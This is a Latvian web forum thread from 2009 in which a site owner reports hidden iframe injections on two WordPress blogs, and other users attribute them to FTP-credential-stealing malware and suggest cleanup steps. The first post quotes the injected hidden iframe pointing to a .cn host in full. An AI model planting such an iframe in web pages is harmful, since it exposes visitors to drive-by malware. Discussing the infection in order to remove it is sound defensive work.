TadeUSH Posted August 7, 2009 Report Share Posted August 7, 2009 Labdien! Pirms 2 dienām, 2 wordpress blogiem, kas atradās zem viena domēna notika uzbrukums. index.php un wp-includes/defult-filters.php tika pievienots <iframe src="http://lotbetsite.cn:8080/index.php" width=137 height=148 style="visibility: hidden"></iframe> Tikai tagad nedomā visi līst iekšā tajā saitā, it sevišķi kam ir neaizsargāti Windowi Googles tantē izmeklējos par šādu problēmu un atradu ka neesmu vienīgais, tikai veiksmīgu risinājumu pret uzbrukumu nesaņēmu. Tikai vesela virkne par to ka vajag pārbaudīt PC un ka uzbrukums notiek tieši caur FTP, bet tas nu gan nav iespējams, jo lietoju vienotu FTP ACC un dažādus CMS, bet problēmas ir tieši ar WordPress. Varbūt ir kādam kādi risinājumi piedāvājami? Quote Link to comment Share on other sites More sharing options...
Val Posted August 7, 2009 Report Share Posted August 7, 2009 jaunāko wp versiju uzliki? Quote Link to comment Share on other sites More sharing options...
darksign Posted August 7, 2009 Report Share Posted August 7, 2009 Tur visticamāk nav nekāds sakars ar pašu wordpress. Man arī tā gadījās uz viena klienta lapas, kur ir savs php rakstīts. Izrādījās pētot logus, ka tur tie faili ir izmainīti caur ftp no ārzemju ip. Kaut kāds botnets uzdarbojies. Klients bija dabūjis vīrusu datorā, kurš pārķer ftp paroles. Kamēr kopējis kaut kādus failus. Problēmu atrisināju vienkārši nomainot ftp paroles. Pamainīju drošības pēc arī failiem permisijas uz readonly, katru reizi kad kaut ko mainīju atstāju tikai apachem lai var skatīt. Un protams klientam pārinstalēju un iztīriju kompi, uzliku normālu antivīrusu (iesaku esset smart security (nod32) vai kaspersky, bet kaspersky manuprāt bremzē kompi mazliet vairāk nekā nod32). Pašus iframe tagus protams vajag uzreiz izdzēst. Pie tam paskaties vai tik uz servera visaadās mapītēs tur pat blakus nav nezināmas izcelsmes html faili... kurus arī vajag izdzēst, citādi google ieliks tevi blacklistā... un ta būs jāraksta vēlstules (caur google webmaster tools ... ), lai njem ārā... (vinji pavisam neiznjem, bet tikai ieliek arhiivaa..) Quote Link to comment Share on other sites More sharing options...
zemene Posted August 17, 2009 Report Share Posted August 17, 2009 Šāds joks jau sen ceļo pa internetu, kā un kur viņu noķer hz baigā **** īstenībā... Vīrus ir tavā PC un tiklīdz tu konektējies savam ftp klāt viņš laikam paroles saglabā vai ko tur ... tad pēc kāda laika viņš sasprauž <iframes> pārsvarā visiem index.php failiem :) rezultātā lapu vispār neielādē vai izķērnā izskatu tipa header parādās izkropļots etc .. Parasti tādas inficētās iframe lapas baigi lēni veras vaļā tjipa uzkarās... Kā jūs domājat vai ja es ieejot tādā lapā kurai ir šāds <iframe src="http://**************/index.php" width=137 height=148 style="visibility: hidden"></iframe> pats arī varu inficēties ? Quote Link to comment Share on other sites More sharing options...
404 Posted August 18, 2009 Report Share Posted August 18, 2009 Nu tie iframer tipa trojāni jau ir diezgan advancēti palikuši.Nav obligāti jāslēdzas pašam klāt ftp.Šie māk arī klusi backgroundā ftp savienojumu uzturēt.Nenāk par sliktu pačekot,kādi ir aktīvie savienojumi,ja ir bijis šāds gadījums.Gadās pārsteigumi,ka botnets mierīgi darbojas bez nekādām pazīmēm :) Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.